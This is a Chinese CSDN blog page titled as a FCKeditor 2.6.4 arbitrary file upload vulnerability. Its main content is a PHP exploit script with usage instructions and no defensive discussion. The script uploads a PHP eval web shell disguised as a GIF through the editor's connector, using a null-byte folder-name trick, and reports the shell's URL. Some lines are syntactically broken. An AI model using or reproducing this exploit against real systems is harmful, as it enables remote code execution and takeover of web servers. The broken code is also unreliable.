fckeditor 2 6 4 任意文件上传漏洞

fckeditor 2 6 4 任意文件上传漏洞
摘要由CSDN通过智能技术生成

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

               
<?error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){ $sock = fsockopen($host, 80); while (!$sock) {  print "\n[-] No response from {$host}:80 Trying again...";  $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); print $resp; return $resp;}function connector_response($html)global $match; return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));}print "\n+------------------------------------------------------------------+";print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ     |";print "\n+------------------------------------------------------------------+\n";if ($argc < 3){ print "\nUsage......: php $argv[0] host path\n"print "\nExample....: php $argv[0] localhost /\n"print "\nExample....: php $argv[0] localhost /FCKEditor/\n"die();}$host = $argv[1];$path = ereg_replace("(/){2,}", "/", $argv[2]);$filename  = "fvck.gif";$foldername = "fuck.php%00.gif";$connector = "editor/filemanager/connectors/php/connector.php";$payload  = "-----------------------------265001916915724\r\n";$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";$payload .= "Content-Type:  image/jpeg\r\n\r\n";$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";$payload .= "-----------------------------265001916915724--\r\n";$packet  = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;$packet .= "Host: {$host}\r\n";$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";$packet .= "Content-Length: ".strlen($payload)."\r\n";$packet .= "Connection: close\r\n\r\n";$packet .= $payload;print $packet;if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");else print "\n[-] Job done! try http://${host}/$match[2] \n";?>

           

给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值